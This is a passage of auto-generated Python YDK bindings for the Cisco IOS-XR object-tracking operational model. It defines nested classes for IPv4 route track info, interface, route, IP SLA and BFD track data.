.. attribute:: tracke_name
Track Name
**type**\: str
**length:** 0..33
**config**\: False
.. attribute:: type
Track type
**type**\: :py:class:`Track <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.Track>`
**config**\: False
.. attribute:: track_state
Track state
**type**\: bool
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeIpv4RouteBrief.TrackInfoBrief, self).__init__()
self.yang_name = "track-info-brief"
self.yang_parent_name = "track-type-ipv4-route-brief"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("track-type-info", ("track_type_info", ObjectTracking.TrackTypeIpv4RouteBrief.TrackInfoBrief.TrackTypeInfo))])
self._leafs = OrderedDict([
('tracke_name', (YLeaf(YType.str, 'tracke-name'), ['str'])),
('type', (YLeaf(YType.enumeration, 'type'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper', 'Track', '')])),
('track_state', (YLeaf(YType.boolean, 'track-state'), ['bool'])),
])
self.tracke_name = None
self.type = None
self.track_state = None
self.track_type_info = ObjectTracking.TrackTypeIpv4RouteBrief.TrackInfoBrief.TrackTypeInfo()
self.track_type_info.parent = self
self._children_name_map["track_type_info"] = "track-type-info"
self._segment_path = lambda: "track-info-brief"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/track-type-ipv4-route-brief/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeIpv4RouteBrief.TrackInfoBrief, ['tracke_name', 'type', 'track_state'], name, value)
class TrackTypeInfo(_Entity_):
"""
Track type information
.. attribute:: interface_tracks
track type interface info
**type**\: :py:class:`InterfaceTracks <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeIpv4RouteBrief.TrackInfoBrief.TrackTypeInfo.InterfaceTracks>`
**config**\: False
.. attribute:: route_tracks
track type route info
**type**\: :py:class:`RouteTracks <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeIpv4RouteBrief.TrackInfoBrief.TrackTypeInfo.RouteTracks>`
**config**\: False
.. attribute:: ipsla_tracks
track type rtr info
**type**\: :py:class:`IpslaTracks <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeIpv4RouteBrief.TrackInfoBrief.TrackTypeInfo.IpslaTracks>`
**config**\: False
.. attribute:: bfd_tracks
track type bfdrtr info
**type**\: :py:class:`BfdTracks <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeIpv4RouteBrief.TrackInfoBrief.TrackTypeInfo.BfdTracks>`
**config**\: False
.. attribute:: discriminant
discriminant
**type**\: :py:class:`Track <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.Track>`
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeIpv4RouteBrief.TrackInfoBrief.TrackTypeInfo, self).__init__()
self.yang_name = "track-type-info"
self.yang_parent_name = "track-info-brief"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("interface-tracks", ("interface_tracks", ObjectTracking.TrackTypeIpv4RouteBrief.TrackInfoBrief.TrackTypeInfo.InterfaceTracks)), ("route-tracks", ("route_tracks", ObjectTracking.TrackTypeIpv4RouteBrief.TrackInfoBrief.TrackTypeInfo.RouteTracks)), ("ipsla-tracks", ("ipsla_tracks", ObjectTracking.TrackTypeIpv4RouteBrief.TrackInfoBrief.TrackTypeInfo.IpslaTracks)), ("bfd-tracks", ("bfd_tracks", ObjectTracking.TrackTypeIpv4RouteBrief.TrackInfoBrief.TrackTypeInfo.BfdTracks))])
self._leafs = OrderedDict([
('discriminant', (YLeaf(YType.enumeration, 'discriminant'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper', 'Track', '')])),
])
self.discriminant = None
self.interface_tracks = ObjectTracking.TrackTypeIpv4RouteBrief.TrackInfoBrief.TrackTypeInfo.InterfaceTracks()
self.interface_tracks.parent = self
self._children_name_map["interface_tracks"] = "interface-tracks"
self.route_tracks = ObjectTracking.TrackTypeIpv4RouteBrief.TrackInfoBrief.TrackTypeInfo.RouteTracks()
self.route_tracks.parent = self
self._children_name_map["route_tracks"] = "route-tracks"
self.ipsla_tracks = ObjectTracking.TrackTypeIpv4RouteBrief.TrackInfoBrief.TrackTypeInfo.IpslaTracks()
self.ipsla_tracks.parent = self
self._children_name_map["ipsla_tracks"] = "ipsla-tracks"
self.bfd_tracks = ObjectTracking.TrackTypeIpv4RouteBrief.TrackInfoBrief.TrackTypeInfo.BfdTracks()
self.bfd_tracks.parent = self
self._children_name_map["bfd_tracks"] = "bfd-tracks"
self._segment_path = lambda: "track-type-info"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/track-type-ipv4-route-brief/track-info-brief/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeIpv4RouteBrief.TrackInfoBrief.TrackTypeInfo, ['discriminant'], name, value)
class InterfaceTracks(_Entity_):
"""
track type interface info
.. attribute:: interface_name
Interface Name
**type**\: str
**length:** 0..120
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeIpv4RouteBrief.TrackInfoBrief.TrackTypeInfo.InterfaceTracks, self).__init__()
self.yang_name = "interface-tracks"
self.yang_parent_name = "track-type-info"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('interface_name', (YLeaf(YType.str, 'interface-name'), ['str'])),
])
self.interface_name = None
self._segment_path = lambda: "interface-tracks"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/track-type-ipv4-route-brief/track-info-brief/track-type-info/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeIpv4RouteBrief.TrackInfoBrief.TrackTypeInfo.InterfaceTracks, ['interface_name'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeIpv4RouteBrief.TrackInfoBrief.TrackTypeInfo.InterfaceTracks']['meta_info']
class RouteTracks(_Entity_):
"""
track type route info
.. attribute:: prefix
Prefix
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: prefix_length
Prefix Length
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: vrf
VRF Name
**type**\: str
**length:** 0..120
**config**\: False
.. attribute:: next_hop
Next Hop
**type**\: str
**length:** 0..120
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeIpv4RouteBrief.TrackInfoBrief.TrackTypeInfo.RouteTracks, self).__init__()
self.yang_name = "route-tracks"
self.yang_parent_name = "track-type-info"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('prefix', (YLeaf(YType.uint32, 'prefix'), ['int'])),
('prefix_length', (YLeaf(YType.uint32, 'prefix-length'), ['int'])),
('vrf', (YLeaf(YType.str, 'vrf'), ['str'])),
('next_hop', (YLeaf(YType.str, 'next-hop'), ['str'])),
])
self.prefix = None
self.prefix_length = None
self.vrf = None
self.next_hop = None
self._segment_path = lambda: "route-tracks"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/track-type-ipv4-route-brief/track-info-brief/track-type-info/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeIpv4RouteBrief.TrackInfoBrief.TrackTypeInfo.RouteTracks, ['prefix', 'prefix_length', 'vrf', 'next_hop'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeIpv4RouteBrief.TrackInfoBrief.TrackTypeInfo.RouteTracks']['meta_info']
class IpslaTracks(_Entity_):
"""
track type rtr info
.. attribute:: ipsla_op_id
Op Id
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: rtt
Latest RTT
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: return_code
Latest Return Code
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: return_code_string
Latest Ret Code String
**type**\: str
**length:** 0..120
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeIpv4RouteBrief.TrackInfoBrief.TrackTypeInfo.IpslaTracks, self).__init__()
self.yang_name = "ipsla-tracks"
self.yang_parent_name = "track-type-info"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('ipsla_op_id', (YLeaf(YType.uint32, 'ipsla-op-id'), ['int'])),
('rtt', (YLeaf(YType.uint32, 'rtt'), ['int'])),
('return_code', (YLeaf(YType.uint32, 'return-code'), ['int'])),
('return_code_string', (YLeaf(YType.str, 'return-code-string'), ['str'])),
])
self.ipsla_op_id = None
self.rtt = None
self.return_code = None
self.return_code_string = None
self._segment_path = lambda: "ipsla-tracks"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/track-type-ipv4-route-brief/track-info-brief/track-type-info/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeIpv4RouteBrief.TrackInfoBrief.TrackTypeInfo.IpslaTracks, ['ipsla_op_id', 'rtt', 'return_code', 'return_code_string'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeIpv4RouteBrief.TrackInfoBrief.TrackTypeInfo.IpslaTracks']['meta_info']
class BfdTracks(_Entity_):
"""
track type bfdrtr info
.. attribute:: interface_name
Interface Name
**type**\: str
**length:** 0..120
**config**\: False
.. attribute:: destination_address
Destination Address
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: rate
Rate
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: debounce_count
Debounce Count
**type**\: int
**range:** 0..4294967295
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeIpv4RouteBrief.TrackInfoBrief.TrackTypeInfo.BfdTracks, self).__init__()
self.yang_name = "bfd-tracks"
self.yang_parent_name = "track-type-info"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('interface_name', (YLeaf(YType.str, 'interface-name'), ['str'])),
('destination_address', (YLeaf(YType.uint32, 'destination-address'), ['int'])),
('rate', (YLeaf(YType.uint32, 'rate'), ['int'])),
('debounce_count', (YLeaf(YType.uint32, 'debounce-count'), ['int'])),
])
self.interface_name = None
self.destination_address = None
self.rate = None
self.debounce_count = None
self._segment_path = lambda: "bfd-tracks"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/track-type-ipv4-route-brief/track-info-brief/track-type-info/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeIpv4RouteBrief.TrackInfoBrief.TrackTypeInfo.BfdTracks, ['interface_name', 'destination_address', 'rate', 'debounce_count'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeIpv4RouteBrief.TrackInfoBrief.TrackTypeInfo.BfdTracks']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeIpv4RouteBrief.TrackInfoBrief.TrackTypeInfo']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeIpv4RouteBrief.TrackInfoBrief']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeIpv4RouteBrief']['meta_info']
class TrackTypeIpv4Route(_Entity_):
"""
Object Tracking Type IPV4 route info
.. attribute:: track_info
track info
**type**\: list of :py:class:`TrackInfo <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeIpv4Route.TrackInfo>`
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeIpv4Route, self).__init__()
self.yang_name = "track-type-ipv4-route"
self.yang_parent_name = "object-tracking"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("track-info", ("track_info", ObjectTracking.TrackTypeIpv4Route.TrackInfo))])
self._leafs = OrderedDict()
self.track_info = YList(self)
self._segment_path = lambda: "track-type-ipv4-route"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeIpv4Route, [], name, value)
class TrackInfo(_Entity_):
"""
track info
.. attribute:: track_type_info
Track type information
**type**\: :py:class:`TrackTypeInfo <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeIpv4Route.TrackInfo.TrackTypeInfo>`
**config**\: False
.. attribute:: bool_tracks
boolean objects
**type**\: :py:class:`BoolTracks <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeIpv4Route.TrackInfo.BoolTracks>`
**config**\: False
.. attribute:: threshold_tracks
Threshold objects
**type**\: :py:class:`ThresholdTracks <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeIpv4Route.TrackInfo.ThresholdTracks>`
**config**\: False
.. attribute:: tracking_interaces
Tracking Interfaces
**type**\: :py:class:`TrackingInteraces <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeIpv4Route.TrackInfo.TrackingInteraces>`
**config**\: False
.. attribute:: delayed
Is the state change delay counter in progress
**type**\: :py:class:`Delayed <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeIpv4Route.TrackInfo.Delayed>`
**config**\: False
.. attribute:: tracke_name
Track Name
**type**\: str
**length:** 0..33
**config**\: False
.. attribute:: type
Track type
**type**\: :py:class:`Track <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.Track>`
**config**\: False
.. attribute:: track_state
Track state
**type**\: bool
**config**\: False
.. attribute:: state_change_counter
State Change Counter
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: seconds_last_change
Seconds Last Change
**type**\: int
**range:** 0..18446744073709551615
**config**\: False
**units**\: second
.. attribute:: threshold_up
User specified threshold upper limit
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: threshold_down
User specified threshold lower limit
**type**\: int
**range:** 0..4294967295
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeIpv4Route.TrackInfo, self).__init__()
self.yang_name = "track-info"
self.yang_parent_name = "track-type-ipv4-route"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("track-type-info", ("track_type_info", ObjectTracking.TrackTypeIpv4Route.TrackInfo.TrackTypeInfo)), ("bool-tracks", ("bool_tracks", ObjectTracking.TrackTypeIpv4Route.TrackInfo.BoolTracks)), ("threshold-tracks", ("threshold_tracks", ObjectTracking.TrackTypeIpv4Route.TrackInfo.ThresholdTracks)), ("tracking-interaces", ("tracking_interaces", ObjectTracking.TrackTypeIpv4Route.TrackInfo.TrackingInteraces)), ("delayed", ("delayed", ObjectTracking.TrackTypeIpv4Route.TrackInfo.Delayed))])
self._leafs = OrderedDict([
('tracke_name', (YLeaf(YType.str, 'tracke-name'), ['str'])),
('type', (YLeaf(YType.enumeration, 'type'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper', 'Track', '')])),
('track_state', (YLeaf(YType.boolean, 'track-state'), ['bool'])),
('state_change_counter', (YLeaf(YType.uint32, 'state-change-counter'), ['int'])),
('seconds_last_change', (YLeaf(YType.uint64, 'seconds-last-change'), ['int'])),
('threshold_up', (YLeaf(YType.uint32, 'threshold-up'), ['int'])),
('threshold_down', (YLeaf(YType.uint32, 'threshold-down'), ['int'])),
])
self.tracke_name = None
self.type = None
self.track_state = None
self.state_change_counter = None
self.seconds_last_change = None
self.threshold_up = None
self.threshold_down = None
self.track_type_info = ObjectTracking.TrackTypeIpv4Route.TrackInfo.TrackTypeInfo()
self.track_type_info.parent = self
self._children_name_map["track_type_info"] = "track-type-info"
self.bool_tracks = ObjectTracking.TrackTypeIpv4Route.TrackInfo.BoolTracks()
self.bool_tracks.parent = self
self._children_name_map["bool_tracks"] = "bool-tracks"
self.threshold_tracks = ObjectTracking.TrackTypeIpv4Route.TrackInfo.ThresholdTracks()
self.threshold_tracks.parent = self
self._children_name_map["threshold_tracks"] = "threshold-tracks"
self.tracking_interaces = ObjectTracking.TrackTypeIpv4Route.TrackInfo.TrackingInteraces()
self.tracking_interaces.parent = self
self._children_name_map["tracking_interaces"] = "tracking-interaces"
self.delayed = ObjectTracking.TrackTypeIpv4Route.TrackInfo.Delayed()
self.delayed.parent = self
self._children_name_map["delayed"] = "delayed"
self._segment_path = lambda: "track-info"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/track-type-ipv4-route/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeIpv4Route.TrackInfo, ['tracke_name', 'type', 'track_state', 'state_change_counter', 'seconds_last_change', 'threshold_up', 'threshold_down'], name, value)
class TrackTypeInfo(_Entity_):
"""
Track type information
.. attribute:: interface_tracks
track type interface info
**type**\: :py:class:`InterfaceTracks <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeIpv4Route.TrackInfo.TrackTypeInfo.InterfaceTracks>`
**config**\: False
.. attribute:: route_tracks
track type route info
**type**\: :py:class:`RouteTracks <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeIpv4Route.TrackInfo.TrackTypeInfo.RouteTracks>`
**config**\: False
.. attribute:: ipsla_tracks
track type rtr info
**type**\: :py:class:`IpslaTracks <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeIpv4Route.TrackInfo.TrackTypeInfo.IpslaTracks>`
**config**\: False
.. attribute:: bfd_tracks
track type bfdrtr info
**type**\: :py:class:`BfdTracks <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeIpv4Route.TrackInfo.TrackTypeInfo.BfdTracks>`
**config**\: False
.. attribute:: discriminant
discriminant
**type**\: :py:class:`Track <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.Track>`
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeIpv4Route.TrackInfo.TrackTypeInfo, self).__init__()
self.yang_name = "track-type-info"
self.yang_parent_name = "track-info"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("interface-tracks", ("interface_tracks", ObjectTracking.TrackTypeIpv4Route.TrackInfo.TrackTypeInfo.InterfaceTracks)), ("route-tracks", ("route_tracks", ObjectTracking.TrackTypeIpv4Route.TrackInfo.TrackTypeInfo.RouteTracks)), ("ipsla-tracks", ("ipsla_tracks", ObjectTracking.TrackTypeIpv4Route.TrackInfo.TrackTypeInfo.IpslaTracks)), ("bfd-tracks", ("bfd_tracks", ObjectTracking.TrackTypeIpv4Route.TrackInfo.TrackTypeInfo.BfdTracks))])
self._leafs = OrderedDict([
('discriminant', (YLeaf(YType.enumeration, 'discriminant'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper', 'Track', '')])),
])
self.discriminant = None
self.interface_tracks = ObjectTracking.TrackTypeIpv4Route.TrackInfo.TrackTypeInfo.InterfaceTracks()
self.interface_tracks.parent = self
self._children_name_map["interface_tracks"] = "interface-tracks"
self.route_tracks = ObjectTracking.TrackTypeIpv4Route.TrackInfo.TrackTypeInfo.RouteTracks()
self.route_tracks.parent = self
self._children_name_map["route_tracks"] = "route-tracks"
self.ipsla_tracks = ObjectTracking.TrackTypeIpv4Route.TrackInfo.TrackTypeInfo.IpslaTracks()
self.ipsla_tracks.parent = self
self._children_name_map["ipsla_tracks"] = "ipsla-tracks"
self.bfd_tracks = ObjectTracking.TrackTypeIpv4Route.TrackInfo.TrackTypeInfo.BfdTracks()
self.bfd_tracks.parent = self
self._children_name_map["bfd_tracks"] = "bfd-tracks"
self._segment_path = lambda: "track-type-info"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/track-type-ipv4-route/track-info/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeIpv4Route.TrackInfo.TrackTypeInfo, ['discriminant'], name, value)
class InterfaceTracks(_Entity_):
"""
track type interface info
.. attribute:: interface_name
Interface Name
**type**\: str
**length:** 0..120
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeIpv4Route.TrackInfo.TrackTypeInfo.InterfaceTracks, self).__init__()
self.yang_name = "interface-tracks"
self.yang_parent_name = "track-type-info"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('interface_name', (YLeaf(YType.str, 'interface-name'), ['str'])),
])
self.interface_name = None
self._segment_path = lambda: "interface-tracks"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/track-type-ipv4-route/track-info/track-type-info/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeIpv4Route.TrackInfo.TrackTypeInfo.InterfaceTracks, ['interface_name'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeIpv4Route.TrackInfo.TrackTypeInfo.InterfaceTracks']['meta_info']
class RouteTracks(_Entity_):
"""
track type route info
.. attribute:: prefix
Prefix
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: prefix_length
Prefix Length
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: vrf
VRF Name
**type**\: str
**length:** 0..120
**config**\: False
.. attribute:: next_hop
Next Hop
**type**\: str
**length:** 0..120
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeIpv4Route.TrackInfo.TrackTypeInfo.RouteTracks, self).__init__()
self.yang_name = "route-tracks"
self.yang_parent_name = "track-type-info"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('prefix', (YLeaf(YType.uint32, 'prefix'), ['int'])),
('prefix_length', (YLeaf(YType.uint32, 'prefix-length'), ['int'])),
('vrf', (YLeaf(YType.str, 'vrf'), ['str'])),
('next_hop', (YLeaf(YType.str, 'next-hop'), ['str'])),
])
self.prefix = None
self.prefix_length = None
self.vrf = None
self.next_hop = None
self._segment_path = lambda: "route-tracks"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/track-type-ipv4-route/track-info/track-type-info/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeIpv4Route.TrackInfo.TrackTypeInfo.RouteTracks, ['prefix', 'prefix_length', 'vrf', 'next_hop'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeIpv4Route.TrackInfo.TrackTypeInfo.RouteTracks']['meta_info']
class IpslaTracks(_Entity_):
"""
track type rtr info
.. attribute:: ipsla_op_id
Op Id
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: rtt
Latest RTT
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: return_code
Latest Return Code
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: return_code_string
Latest Ret Code String
**type**\: str
**length:** 0..120
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeIpv4Route.TrackInfo.TrackTypeInfo.IpslaTracks, self).__init__()
self.yang_name = "ipsla-tracks"
self.yang_parent_name = "track-type-info"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('ipsla_op_id', (YLeaf(YType.uint32, 'ipsla-op-id'), ['int'])),
('rtt', (YLeaf(YType.uint32, 'rtt'), ['int'])),
('return_code', (YLeaf(YType.uint32, 'return-code'), ['int'])),
('return_code_string', (YLeaf(YType.str, 'return-code-string'), ['str'])),
])
self.ipsla_op_id = None
self.rtt = None
self.return_code = None
self.return_code_string = None
self._segment_path = lambda: "ipsla-tracks"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/track-type-ipv4-route/track-info/track-type-info/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeIpv4Route.TrackInfo.TrackTypeInfo.IpslaTracks, ['ipsla_op_id', 'rtt', 'return_code', 'return_code_string'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeIpv4Route.TrackInfo.TrackTypeInfo.IpslaTracks']['meta_info']
class BfdTracks(_Entity_):
"""
track type bfdrtr info
.. attribute:: interface_name
Interface Name
**type**\: str
**length:** 0..120
**config**\: False
.. attribute:: destination_address
Destination Address
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: rate
Rate
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: debounce_count
Debounce Count
**type**\: int
**range:** 0..4294967295
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeIpv4Route.TrackInfo.TrackTypeInfo.BfdTracks, self).__init__()
self.yang_name = "bfd-tracks"
self.yang_parent_name = "track-type-info"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('interface_name', (YLeaf(YType.str, 'interface-name'), ['str'])),
('destination_address', (YLeaf(YType.uint32, 'destination-address'), ['int'])),
('rate', (YLeaf(YType.uint32, 'rate'), ['int'])),
('debounce_count', (YLeaf(YType.uint32, 'debounce-count'), ['int'])),
])
self.interface_name = None
self.destination_address = None
self.rate = None
self.debounce_count = None
self._segment_path = lambda: "bfd-tracks"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/track-type-ipv4-route/track-info/track-type-info/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeIpv4Route.TrackInfo.TrackTypeInfo.BfdTracks, ['interface_name', 'destination_address', 'rate', 'debounce_count'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeIpv4Route.TrackInfo.TrackTypeInfo.BfdTracks']['meta_info']
@staticmethod
def _meta_info():
